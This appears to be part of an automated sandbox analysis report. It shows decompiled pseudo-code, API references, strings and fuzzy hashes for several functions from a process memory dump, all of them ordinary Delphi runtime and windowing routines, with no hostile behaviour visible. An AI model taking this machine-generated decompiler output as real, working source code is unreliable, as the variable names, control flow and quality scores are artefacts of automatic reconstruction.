Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Window$Active$MessageRect
String ID: (
API String ID: 3147912190-3887548279
Opcode ID: 515f52ee7629eacb8409f07f6c1ae70dd108bb3a62ad12a948c02f90eec53567
Instruction ID: cd14cec1936ef2a5a1d1570e25637d8a351f88fc444e63daf3eca10baf97b1ba
Opcode Fuzzy Hash: 515f52ee7629eacb8409f07f6c1ae70dd108bb3a62ad12a948c02f90eec53567
Instruction Fuzzy Hash: 0F412D75A00208AFEB04DFA9CD81FAEB7F9EB48704F55846AF505E7392D778AD008B54

Uniqueness

Uniqueness Score: -1.00%

Function 00419668, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109
threadCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00419668(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v5;
				intOrPtr* _v12;
				long _v16;
				char _v20;
				char _v24;
				long _t22;
				char _t29;
				void* _t53;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr _t63;
				intOrPtr _t66;
				intOrPtr _t67;
				void* _t72;
				void* _t73;
				intOrPtr _t74;

				_t72 = _t73;
				_t74 = _t73 + 0xffffffec;
				_push(__esi);
				_push(__edi);
				_t53 = __eax;
				_t22 = GetCurrentThreadId();
				_t62 =  *0x47a11c; // 0x47b030
				if(_t22 !=  *_t62) {
					_v24 = GetCurrentThreadId();
					_v20 = 0;
					_t61 =  *0x479fc0; // 0x410b4c
					E0040B714(_t53, _t61, 1, __edi, __esi, 0,  &_v24);
					E00403BF4();
				}
				if(_t53 <= 0) {
					E00419640();
				} else {
					E0041964C(_t53);
				}
				_v16 = 0;
				_push(0x47b884);
				L0040628C();
				_push(_t72);
				_push(0x4197f6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				_v16 = InterlockedExchange(0x4793e8, _v16);
				_push(_t72);
				_push(0x4197d7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				if(_v16 == 0 ||  *((intOrPtr*)(_v16 + 8)) <= 0) {
					_t29 = 0;
				} else {
					_t29 = 1;
				}
				_v5 = _t29;
				if(_v5 == 0) {
					L15:
					_pop(_t63);
					 *[fs:eax] = _t63;
					_push(E004197DE);
					return E0040346C(_v16);
				} else {
					if( *((intOrPtr*)(_v16 + 8)) > 0) {
						_v12 = E00413E68(_v16, 0);
						E00413D58(_v16, 0);
						L004063B4();
						 *[fs:eax] = _t74;
						 *[fs:eax] = _t74;
						 *((intOrPtr*)( *_v12 + 8))( *[fs:eax], _t72,  *[fs:eax], 0x4197a1, _t72, 0x47b884);
						_pop(_t66);
						 *[fs:eax] = _t66;
						_t67 = 0x419772;
						 *[fs:eax] = _t67;
						_push(E004197A8);
						_push(0x47b884);
						L0040628C();
						return 0;
					} else {
						goto L15;
					}
				}
			}

0x00419669
0x0041966b
0x0041966f
0x00419670
0x00419671
0x00419673
0x00419678
0x00419680
0x00419687
0x0041968a
0x00419694
0x004196a1
0x004196a6
0x004196a6
0x004196ad
0x004196b8
0x004196af
0x004196b1
0x004196b1
0x004196bf
0x004196c2
0x004196c7
0x004196ce
0x004196cf
0x004196d4
0x004196d7
0x004196e8
0x004196ed
0x004196ee
0x004196f3
0x004196f6
0x004196fd
0x00419708
0x0041970c
0x0041970c
0x0041970c
0x0041970e
0x00419715
0x004197c1
0x004197c3
0x004197c6
0x004197c9
0x004197d6
0x0041971b
0x004197bb
0x0041972a
0x00419732
0x0041973c
0x0041974c
0x0041975a
0x00419765
0x0041976a
0x0041976d
0x0041978b
0x0041978e
0x00419791
0x00419796
0x0041979b
0x004197a0
0x00000000
0x00000000
0x00000000
0x004197bb

APIs

GetCurrentThreadId.KERNEL32 ref: 00419673
GetCurrentThreadId.KERNEL32 ref: 00419682

Part of subcall function 00419640: ResetEvent.KERNEL32(00000174,004196BD), ref: 00419646

RtlEnterCriticalSection.NTDLL(0047B884), ref: 004196C7
InterlockedExchange.KERNEL32(004793E8,?), ref: 004196E3
RtlLeaveCriticalSection.NTDLL(0047B884), ref: 0041973C
RtlEnterCriticalSection.NTDLL(0047B884), ref: 0041979B

Strings

8&A, xrefs: 0041969C

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
String ID: 8&A
API String ID: 2189153385-389848856
Opcode ID: d3bd2877f0a7c09705e8158d33bf006da81a1b306234ba8b5044abcbd71e535a
Instruction ID: b00a10e4d281bf59ce8b1b3397dc0b54de338f2e4545dac62f78258b82b534be
Opcode Fuzzy Hash: d3bd2877f0a7c09705e8158d33bf006da81a1b306234ba8b5044abcbd71e535a
Instruction Fuzzy Hash: B931A530A14304AFD701EFA5C862AEDB7E8EF49704F6684B6F414926D1D73D9C50CA29

Uniqueness

Uniqueness Score: -1.00%

Function 0042270C, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E0042270C(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				struct HMONITOR__* _t27;
				struct tagMONITORINFO* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x47b93c != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						_t29->rcMonitor.left = 0;
						_t29->rcMonitor.top = 0;
						_t29->rcMonitor.right = GetSystemMetrics(0);
						_t29->rcMonitor.bottom = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00406444();
						}
						_t24 = 1;
					}
				} else {
					 *0x47b920 = E004223DC(4, _t23,  *0x47b920, _t27, _t29);
					_t24 = GetMonitorInfoA(_t27, _t29);
				}
				return _t24;
			}

0x00422715
0x00422718
0x00422722
0x00422747
0x0042274f
0x0042276f
0x00422774
0x0042277f
0x0042278a
0x00422794
0x00422795
0x00422796
0x00422797
0x00422798
0x00422799
0x004227a3
0x004227a5
0x004227ad
0x004227ae
0x004227ae
0x004227b3
0x004227b3
0x00422724
0x00422736
0x00422743
0x00422743
0x004227bd

APIs

GetMonitorInfoA.USER32(?,?), ref: 0042273D
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00422764
GetSystemMetrics.USER32(00000000), ref: 00422779
GetSystemMetrics.USER32(00000001), ref: 00422784
lstrcpy.KERNEL32(?,DISPLAY), ref: 004227AE

Part of subcall function 004223DC: GetProcAddress.KERNEL32(745C0000,00000000), ref: 0042245C

Strings

GetMonitorInfo, xrefs: 00422724
DISPLAY, xrefs: 004227A5

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfo
API String ID: 1539801207-1633989206
Opcode ID: 974c75291028176e42d13dae0d986ecd793b55edffda241bc6c5993148428295
Instruction ID: d3c68cb7e5f7cd54e91d17da34bd044bb74d5e4be6c9a16b509d23d844f096e0
Opcode Fuzzy Hash: 974c75291028176e42d13dae0d986ecd793b55edffda241bc6c5993148428295
Instruction Fuzzy Hash: 2A11E1B17057286FD7208F61AD447A7B7E8EB49710F40493AEE19D7240E3B4A8808BA8

Uniqueness

Uniqueness Score: -1.00%

Function 004227E0, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E004227E0(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x47b93d != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00406444();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x47b924; // 0x4227e0
					 *0x47b924 = E004223DC(5, _t23, _t26, _t27, _t29);
					_t24 =  *0x47b924(_t27, _t29);
				}
				return _t24;
			}

0x004227e9
0x004227ec
0x004227f6
0x0042281b
0x00422823
0x00422843
0x00422848
0x00422853
0x0042285e
0x00422868
0x00422869
0x0042286a
0x0042286b
0x0042286c
0x0042286d
0x00422877
0x00422879
0x00422881
0x00422882
0x00422882
0x00422887
0x00422887
0x004227f8
0x004227fd
0x0042280a
0x00422817
0x00422817
0x00422891

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00422838
GetSystemMetrics.USER32(00000000), ref: 0042284D
GetSystemMetrics.USER32(00000001), ref: 00422858
lstrcpy.KERNEL32(?,DISPLAY), ref: 00422882

Part of subcall function 004223DC: GetProcAddress.KERNEL32(745C0000,00000000), ref: 0042245C

Strings

'B, xrefs: 004227FD, 0042280A, 00422811
GetMonitorInfoA, xrefs: 004227F8
DISPLAY, xrefs: 00422879

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: System$Metrics$AddressInfoParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfoA$'B
API String ID: 2545840971-2064005331
Opcode ID: 11ca09601dbee3ccbfe1173f142a20817b501bee758b38835efb87562a69eecf
Instruction ID: 038b7de01a3aebff30798a460667cbd436dbca40844fcf4c83d304ff5d82f4b2
Opcode Fuzzy Hash: 11ca09601dbee3ccbfe1173f142a20817b501bee758b38835efb87562a69eecf
Instruction Fuzzy Hash: 6011E7B1701329AFD720AF60AD447A777E8EB05350F40463AEE5997340D7B4A8408BAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040405C, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040405C(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x47b044 == 0) {
					if( *0x479030 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x47b218 == 0xd7b2 &&  *0x47b220 > 0) {
						 *0x47b230();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), 0x4040e4, 2,  &_v4, 0);
				}
			}

0x00404064
0x004040c4
0x004040d4
0x004040d4
0x004040da
0x00404066
0x0040406f
0x0040407f
0x0040407f
0x0040409b
0x004040bc
0x004040bc

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00404126,?,?,?,?,?,?,?,004041D2,00402B5B), ref: 00404095
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00404126,?,?,?,?,?,?,?,004041D2), ref: 0040409B
GetStdHandle.KERNEL32(000000F5,004040E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00404126), ref: 004040B0
WriteFile.KERNEL32(00000000,000000F5,004040E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00404126), ref: 004040B6
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 004040D4

Strings

Runtime error at 00000000, xrefs: 0040408E, 004040CD
Error, xrefs: 004040C8

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: c46b9e592332834341c8aac1b82159a12851ee92ffc91eccf822de94a3719203
Instruction ID: 792bbb5842f0e237c5821bb7421577ef3977d26575fc33f025656d1aa157ca7c
Opcode Fuzzy Hash: c46b9e592332834341c8aac1b82159a12851ee92ffc91eccf822de94a3719203
Instruction Fuzzy Hash: 97F0B1D059138475E62073905D0AFDF225C9784F18F10457FB32CB90E387BC48C496AD

Uniqueness

Uniqueness Score: -1.00%

Function 004200D8, Relevance: 12.2, APIs: 8, Instructions: 217
windowCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E004200D8(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				void* _v12;
				char _v13;
				struct tagPOINT _v21;
				struct HDC__* _v28;
				void* _v32;
				intOrPtr _t78;
				struct HDC__* _t80;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				char _t85;
				void* _t92;
				struct HDC__* _t115;
				void* _t136;
				struct HDC__* _t160;
				intOrPtr* _t164;
				intOrPtr _t172;
				intOrPtr _t176;
				intOrPtr _t178;
				intOrPtr _t180;
				int* _t184;
				intOrPtr _t186;
				void* _t188;
				void* _t189;
				intOrPtr _t190;

				_t165 = __ecx;
				_t188 = _t189;
				_t190 = _t189 + 0xffffffe4;
				_t184 = __ecx;
				_v8 = __edx;
				_t164 = __eax;
				_t186 =  *((intOrPtr*)(__eax + 0x28));
				_t172 =  *0x420324; // 0xf
				E0041D794(_v8, __ecx, _t172);
				E00420668(_t164);
				_v12 = 0;
				_v13 = 0;
				_t78 =  *((intOrPtr*)(_t186 + 0x10));
				if(_t78 != 0) {
					_push(0xffffffff);
					_push(_t78);
					_t160 =  *(_v8 + 4);
					_push(_t160);
					L004065AC();
					_v12 = _t160;
					_push( *(_v8 + 4));
					L00406584();
					_v13 = 1;
				}
				_push(0xc);
				_t80 =  *(_v8 + 4);
				_push(_t80);
				L00406514();
				_push(_t80);
				_push(0xe);
				_t82 =  *(_v8 + 4);
				L00406514();
				_t83 = _t82;
				_t84 = _t83 * _t82;
				if(_t84 > 8) {
					L4:
					_t85 = 0;
				} else {
					_t165 =  *(_t186 + 0x28) & 0x0000ffff;
					if(_t84 < ( *(_t186 + 0x2a) & 0x0000ffff) * ( *(_t186 + 0x28) & 0x0000ffff)) {
						_t85 = 1;
					} else {
						goto L4;
					}
				}
				if(_t85 == 0) {
					if(E00420464(_t164) == 0) {
						SetStretchBltMode(E0041D6C0(_v8), 3);
					}
				} else {
					GetBrushOrgEx( *(_v8 + 4),  &_v21);
					SetStretchBltMode( *(_v8 + 4), 4);
					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
				}
				_push(_t188);
				_push(0x420314);
				_push( *[fs:eax]);
				 *[fs:eax] = _t190;
				if( *((intOrPtr*)( *_t164 + 0x28))() != 0) {
					E00420608(_t164, _t165);
				}
				_t92 = E004203A8(_t164);
				_t176 =  *0x420324; // 0xf
				E0041D794(_t92, _t165, _t176);
				if( *((intOrPtr*)( *_t164 + 0x28))() == 0) {
					StretchBlt( *(_v8 + 4),  *_t184, _t184[1], _t184[2] -  *_t184, _t184[3] - _t184[1],  *(E004203A8(_t164) + 4), 0, 0,  *(_t186 + 0x1c),  *(_t186 + 0x20),  *(_v8 + 0x20));
					_pop(_t178);
					 *[fs:eax] = _t178;
					_push(0x42031b);
					if(_v13 != 0) {
						_push(0xffffffff);
						_push(_v12);
						_t115 =  *(_v8 + 4);
						_push(_t115);
						L004065AC();
						return _t115;
					}
					return 0;
				} else {
					_v32 = 0;
					_v28 = 0;
					_push(_t188);
					_push(0x4202a9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t190;
					L00406484();
					_v28 = E0041DAAC(0);
					_v32 = SelectObject(_v28,  *(_t186 + 0xc));
					E0041DC50( *(_v8 + 4), _t164, _t184[1],  *_t184, _t184, _t186, 0, 0, _v28,  *(_t186 + 0x20),  *(_t186 + 0x1c), 0, 0,  *(E004203A8(_t164) + 4), _t184[3] - _t184[1], _t184[2] -  *_t184);
					_t136 = 0;
					_t180 = 0;
					 *[fs:eax] = _t180;
					_push(0x4202ee);
					if(_v32 != 0) {
						_t136 = SelectObject(_v28, _v32);
					}
					if(_v28 != 0) {
						return DeleteDC(_v28);
					}
					return _t136;
				}
			}

0x004200d8
0x004200d9
0x004200db
0x004200e1
0x004200e3
0x004200e6
0x004200e8
0x004200eb
0x004200f4
0x004200fb
0x00420102
0x00420105
0x00420109
0x0042010e
0x00420110
0x00420112
0x00420116
0x00420119
0x0042011a
0x0042011f
0x00420128
0x00420129
0x0042012e
0x0042012e
0x00420132
0x00420137
0x0042013a
0x0042013b
0x00420140
0x00420141
0x00420146
0x0042014a
0x00420151
0x00420152
0x00420157
0x00420168
0x00420168
0x00420159
0x0042015d
0x00420166
0x0042016c
0x00000000
0x00000000
0x00000000
0x00420166
0x00420170
0x004201b3
0x004201c0
0x004201c0
0x00420172
0x0042017d
0x0042018b
0x004201a3
0x004201a3
0x004201c7
0x004201c8
0x004201cd
0x004201d0
0x004201dc
0x004201e0
0x004201e0
0x004201e7
0x004201ec
0x004201f2
0x00420200
0x004202e9
0x004202f0
0x004202f3
0x004202f6
0x004202ff
0x00420301
0x00420306
0x0042030a
0x0042030d
0x0042030e
0x00000000
0x0042030e
0x00420313
0x00420206
0x00420208
0x0042020d
0x00420212
0x00420213
0x00420218
0x0042021b
0x00420220
0x0042022a
0x0042023a
0x00420274
0x00420279
0x0042027b
0x0042027e
0x00420281
0x0042028a
0x00420294
0x00420294
0x0042029d
0x00000000
0x004202a3
0x004202a8
0x004202a8

APIs

Part of subcall function 00420668: 72E7AC50.USER32(00000000,?,?,?,?,0041F297,00000000,0041F323), ref: 004206BE
Part of subcall function 00420668: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0041F297,00000000,0041F323), ref: 00420701

GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 0042017D
SetStretchBltMode.GDI32(?,00000004), ref: 0042018B
SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 004201A3
SetStretchBltMode.GDI32(00000000,00000003), ref: 004201C0
SelectObject.GDI32(?,?), ref: 00420235
SelectObject.GDI32(?,00000000), ref: 00420294
DeleteDC.GDI32(00000000), ref: 004202A3

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: BrushModeObjectSelectStretch$CreateDeleteHalftonePalette
String ID:
API String ID: 2197772979-0
Opcode ID: 9d5856a229aa4b0ed948a8de568aa54b9cc0482c8a5184288b2d209389544f5f
Instruction ID: a80c6b273bba30387f9312ee822ebbf8d6c5fcf69b08db907f7d0bcd7af6b485
Opcode Fuzzy Hash: 9d5856a229aa4b0ed948a8de568aa54b9cc0482c8a5184288b2d209389544f5f
Instruction Fuzzy Hash: 61714A75B00205AFDB50DFA9DD85F5EB7F8AF08304F51856AB508E7682D638ED10CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00447EC4, Relevance: 12.1, APIs: 8, Instructions: 144
windowCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00447EC4(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v22;
				intOrPtr _v28;
				struct HWND__* _v32;
				char _v36;
				intOrPtr _t50;
				intOrPtr _t56;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t68;
				intOrPtr _t70;
				intOrPtr _t80;
				intOrPtr _t82;
				intOrPtr _t85;
				void* _t90;
				void* _t107;
				intOrPtr _t122;
				void* _t124;
				void* _t127;
				void* _t128;
				intOrPtr _t129;

				_t125 = __esi;
				_t124 = __edi;
				_t107 = __ecx;
				_t105 = __ebx;
				_t127 = _t128;
				_t129 = _t128 + 0xffffffe0;
				_push(__ebx);
				_push(__esi);
				_v36 = 0;
				_v8 = __eax;
				_push(_t127);
				_push(0x44818c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t129;
				E0042A7B8();
				if( *((char*)(_v8 + 0x57)) != 0 ||  *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x2f4) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x22f)) == 1) {
					_t50 =  *0x479f10; // 0x41abfc
					E00405DCC(_t50, _t107,  &_v36);
					E0040B61C(_v36, 1);
					E00403BF4();
				}
				if(GetCapture() != 0) {
					SendMessageA(GetCapture(), 0x1f, 0, 0);
				}
				ReleaseCapture();
				_t56 =  *0x47bb9c; // 0x2321704
				E0044A3A4(_t56);
				_push(_t127);
				_push(0x44816f);
				_push( *[fs:edx]);
				 *[fs:edx] = _t129;
				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000008;
				_v32 = GetActiveWindow();
				_t60 =  *0x479bac; // 0x0
				_v20 = _t60;
				_t61 =  *0x47bba0; // 0x2321310
				_t20 = _t61 + 0x78; // 0x0
				_t62 =  *0x47bba0; // 0x2321310
				_t21 = _t62 + 0x7c; // 0x2321554
				E00413EE4( *_t21,  *_t20, 0);
				_t65 =  *0x47bba0; // 0x2321310
				 *((intOrPtr*)(_t65 + 0x78)) = _v8;
				_t66 =  *0x47bba0; // 0x2321310
				_t24 = _t66 + 0x44; // 0x0
				_v22 =  *_t24;
				_t68 =  *0x47bba0; // 0x2321310
				E004493C0(_t68,  *_t20, 0);
				_t70 =  *0x47bba0; // 0x2321310
				_t26 = _t70 + 0x48; // 0x0
				_v28 =  *_t26;
				_v16 = E00442264(0, _t105, _t124, _t125);
				_push(_t127);
				_push(0x44814d);
				_push( *[fs:edx]);
				 *[fs:edx] = _t129;
				E00447E14(_v8);
				_push(_t127);
				_push(0x4480ac);
				_push( *[fs:edx]);
				 *[fs:edx] = _t129;
				SendMessageA(E0043260C(_v8), 0xb000, 0, 0);
				 *((intOrPtr*)(_v8 + 0x24c)) = 0;
				do {
					_t80 =  *0x47bb9c; // 0x2321704
					E0044B1AC(_t80, _t124, _t125);
					_t82 =  *0x47bb9c; // 0x2321704
					if( *((char*)(_t82 + 0x9c)) == 0) {
						if( *((intOrPtr*)(_v8 + 0x24c)) != 0) {
							E00447D74(_v8);
						}
					} else {
						 *((intOrPtr*)(_v8 + 0x24c)) = 2;
					}
					_t85 =  *((intOrPtr*)(_v8 + 0x24c));
				} while (_t85 == 0);
				_v12 = _t85;
				SendMessageA(E0043260C(_v8), 0xb001, 0, 0);
				_t90 = E0043260C(_v8);
				if(_t90 != GetActiveWindow()) {
					_v32 = 0;
				}
				_pop(_t122);
				 *[fs:eax] = _t122;
				_push(0x4480b3);
				return E00447E0C();
			}

0x00447ec4
0x00447ec4
0x00447ec4
0x00447ec4
0x00447ec5
0x00447ec7
0x00447eca
0x00447ecb
0x00447ece
0x00447ed1
0x00447ed6
0x00447ed7
0x00447edc
0x00447edf
0x00447ee2
0x00447eee
0x00447f17
0x00447f1c
0x00447f2b
0x00447f30
0x00447f30
0x00447f3c
0x00447f4a
0x00447f4a
0x00447f4f
0x00447f54
0x00447f59
0x00447f60
0x00447f61
0x00447f66
0x00447f69
0x00447f6f
0x00447f7b
0x00447f7e
0x00447f83
0x00447f86
0x00447f8b
0x00447f8e
0x00447f93
0x00447f98
0x00447f9d
0x00447fa5
0x00447fa8
0x00447fad
0x00447fb1
0x00447fb7
0x00447fbc
0x00447fc1
0x00447fc6
0x00447fc9
0x00447fd3
0x00447fd8
0x00447fd9
0x00447fde
0x00447fe1
0x00447fe7
0x00447fee
0x00447fef
0x00447ff4
0x00447ff7
0x0044800c
0x00448016
0x0044801c
0x0044801c
0x00448021
0x00448026
0x00448032
0x0044804d
0x00448052
0x00448052
0x00448034
0x00448037
0x00448037
0x0044805a
0x00448060
0x00448064
0x00448079
0x00448081
0x0044808f
0x00448093
0x00448093
0x00448098
0x0044809b
0x0044809e
0x004480ab

APIs

GetCapture.USER32 ref: 00447F35
GetCapture.USER32 ref: 00447F44
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00447F4A
ReleaseCapture.USER32 ref: 00447F4F
GetActiveWindow.USER32 ref: 00447F76
SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 0044800C
SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00448079
GetActiveWindow.USER32 ref: 00448088

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: CaptureMessageSend$ActiveWindow$Release
String ID:
API String ID: 862346643-0
Opcode ID: 667b4eba30f8ed832c4f445fcd5549055d6f7a8c55defc6b26d7500254163615
Instruction ID: 891ce05c99c7a0c7d3f35091ad499386b188137e12638bb7896e74c7766aeaa3
Opcode Fuzzy Hash: 667b4eba30f8ed832c4f445fcd5549055d6f7a8c55defc6b26d7500254163615
Instruction Fuzzy Hash: E2513A70A00244DFEB10EF6AC946B5E77F1EF48704F5540BAE804AB6A2CB79AD40DB48

Uniqueness

Uniqueness Score: -1.00%

Function 00430648, Relevance: 12.1, APIs: 8, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00430648(void* __eax, void* __ecx, struct HDC__* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				int _v16;
				char _v20;
				struct tagRECT _v36;
				signed int _t54;
				intOrPtr _t59;
				int _t61;
				void* _t63;
				void* _t66;
				void* _t82;
				int _t98;
				struct HDC__* _t99;

				_t99 = __edx;
				_t82 = __eax;
				 *(__eax + 0x54) =  *(__eax + 0x54) | 0x00000080;
				_v16 = SaveDC(__edx);
				E0042A894(__edx, _a4, __ecx);
				IntersectClipRect(__edx, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
				_t98 = 0;
				_v12 = 0;
				if((GetWindowLongA(E0043260C(_t82), 0xffffffec) & 0x00000002) == 0) {
					_t54 = GetWindowLongA(E0043260C(_t82), 0xfffffff0);
					__eflags = _t54 & 0x00800000;
					if((_t54 & 0x00800000) != 0) {
						_v12 = 3;
						_t98 = 0xa00f;
					}
				} else {
					_v12 = 0xa;
					_t98 = 0x200f;
				}
				if(_t98 != 0) {
